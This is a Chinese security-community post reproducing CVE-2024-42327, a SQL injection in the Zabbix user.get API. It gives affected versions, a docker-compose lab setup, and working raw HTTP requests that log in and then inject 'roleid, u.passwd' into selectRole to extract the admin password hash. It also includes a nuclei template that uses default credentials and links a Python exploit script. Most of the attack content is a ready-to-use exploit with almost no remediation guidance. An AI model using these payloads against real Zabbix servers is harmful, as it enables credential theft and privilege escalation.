wahaha2025-03-07文章来源:SecHub网络安全社区
漏洞存在于 user.get API 端点,拥有 API 访问权限的非管理员用户(包括默认的 “用户 ”角色)都可能利用该漏洞。
6.0.0 <= Zabbix <= 6.0.31
6.4.0 <= Zabbix <= 6.4.16
Zabbix 7.0.0
docker 搭建环境
mkdir -p /zabbix-server && cd /zabbix-server && mkdir -p ./mysql/data ./mysql/conf ./mysql/logs ./font ./snmptraps ./mibs ./alertscripts ./externalscripts
docker pull mysql:8.0 && docker pull zabbix/zabbix-java-gateway:6.0.0-ubuntu && docker pull zabbix/zabbix-snmptraps:6.0.0-ubuntu && docker pull zabbix/zabbix-server-mysql:6.0.0-ubuntu && docker pull zabbix/zabbix-web-nginx-mysql:6.0.0-ubuntu
cd /zabbix-server/font/
rm -rf simfang.ttf
version: '3'
services:
mysql:
image: mysql:8.0
container_name: mysql
volumes:
- ./mysql/data:/var/lib/mysql
- ./mysql/conf:/etc/mysql/conf.d
- ./mysql/logs:/var/log/mysql
- /etc/localtime:/etc/localtime
restart: always
privileged: true
environment:
- MYSQL_ROOT_PASSWORD=myrootpass
- MYSQL_DATABASE=zabbix
- MYSQL_USER=zabbix
- MYSQL_PASSWORD=mypass
- TZ=Asia/Shanghai
- LANG=en_US.UTF-8
expose:
- "3306"
networks:
zabbix-net:
command: --character-set-server=utf8 --collation-server=utf8_bin
zabbix-gateway:
image: zabbix/zabbix-java-gateway:6.0.0-ubuntu
container_name: zabbix-gateway
volumes:
- /etc/localtime:/etc/localtime
restart: always
privileged: true
ports:
- "10052:10052"
networks:
zabbix-net:
zabbix-snmptraps:
image: zabbix/zabbix-snmptraps:6.0.0-ubuntu
container_name: zabbix-snmptraps
volumes:
- /etc/localtime:/etc/localtime
- ./snmptraps:/var/lib/zabbix/snmptraps
- ./mibs:/var/lib/zabbix/mibs
restart: always
privileged: true
ports:
- "1162:1162/udp"
networks:
zabbix-net:
zabbix-server:
image: zabbix/zabbix-server-mysql:6.0.0-ubuntu
container_name: zabbix-server
volumes:
- /etc/localtime:/etc/localtime
- ./snmptraps:/var/lib/zabbix/snmptraps
- ./mibs:/var/lib/zabbix/mibs
- ./alertscripts:/usr/lib/zabbix/alertscripts
- ./externalscripts:/usr/lib/zabbix/externalscripts
restart: always
privileged: true
environment:
- ZBX_LISTENPORT=10051
- DB_SERVER_HOST=mysql
- DB_SERVER_PORT=3306
- MYSQL_DATABASE=zabbix
- MYSQL_USER=zabbix
- MYSQL_PASSWORD=mypass
- MYSQL_ROOT_PASSWORD=myrootpass
- ZBX_CACHESIZE=1G
- ZBX_HISTORYCACHESIZE=512M
- ZBX_HISTORYINDEXCACHESIZE=16M
- ZBX_TRENDCACHESIZE=256M
- ZBX_VALUECACHESIZE=256M
- ZBX_STARTPINGERS=64
- ZBX_IPMIPOLLERS=1
- ZBX_ENABLE_SNMP_TRAPS=true
- ZBX_STARTTRAPPERS=1
- ZBX_JAVAGATEWAY_ENABLE=true
- ZBX_JAVAGATEWAY=zabbix-gateway
- ZBX_STARTJAVAPOLLERS=1
ports:
- "10051:10051"
networks:
zabbix-net:
links:
- mysql
- zabbix-gateway
zabbix-web:
image: zabbix/zabbix-web-nginx-mysql:6.0.0-ubuntu
container_name: zabbix-web
volumes:
- ./font/simfang.ttf:/usr/share/zabbix/assets/fonts/DejaVuSans.ttf
- /etc/localtime:/etc/localtime
restart: always
privileged: true
environment:
- ZBX_SERVER_NAME=Zabbix 6.0.0
- ZBX_SERVER_HOST=zabbix-server
- ZBX_SERVER_PORT=10051
- DB_SERVER_HOST=mysql
- DB_SERVER_PORT=3306
- MYSQL_DATABASE=zabbix
- MYSQL_USER=zabbix
- MYSQL_PASSWORD=mypass
- MYSQL_ROOT_PASSWORD=myrootpass
- PHP_TZ=Asia/Shanghai
ports:
- "80:8080"
networks:
zabbix-net:
links:
- mysql
- zabbix-server
networks:
zabbix-net:
driver: bridge
ipam:
config:
- subnet: 10.10.10.0/24
gateway: 10.10.10.1
docker-compose up -d
访问默认端口即可
需要登陆,获取auth_token
POST /api_jsonrpc.php HTTP/1.1
Host: ***.***.***.***
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Connection: keep-alive
Content-Length: 106
Content-Type: application/json-rpc
Accept-Encoding: gzip, deflate, br
{"jsonrpc": "2.0", "method": "user.login", "params": {"username": "aaaa", "password": "123456"}, "id": 1}
用上面的token发送数据
POST /api_jsonrpc.php HTTP/1.1
Host: ***.***.***.***
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Connection: keep-alive
Content-Length: 167
Content-Type: application/json-rpc
Accept-Encoding: gzip, deflate, br
{"jsonrpc": "2.0", "method": "user.get", "params": {"selectRole": ["roleid, u.passwd", "roleid"], "userids": "1"}, "auth": "2bbce9ff7cv2hid40092b297441fa3r4", "id": 1}
nuclei 检测:
id: CVE-2024-42327-zabbix-sqli
info:
name: zabbix-api_jsonrpc-sqli
author: Ly4j
severity: high
tags: zabbix
requests:
- raw:
- |
POST /api_jsonrpc.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json-rpc
{"jsonrpc": "2.0", "method": "user.login", "params": {"username": "Admin", "password": "zabbix"}, "id": 1}
- |
POST /api_jsonrpc.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json-rpc
{"jsonrpc": "2.0", "method": "user.get", "params": {"selectRole": ["roleid, u.passwd", "roleid"], "userids": "1"}, "auth": "{{auth}}", "id": 1}
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body_1,"jsonrpc") && contains_all(body_2,"passwd")
extractors:
- type: json
internal: true
name: auth
json:
- '.result'
python 利用脚本:
https://github.com/aramosf/cve-2024-42327?tab=readme-ov-file
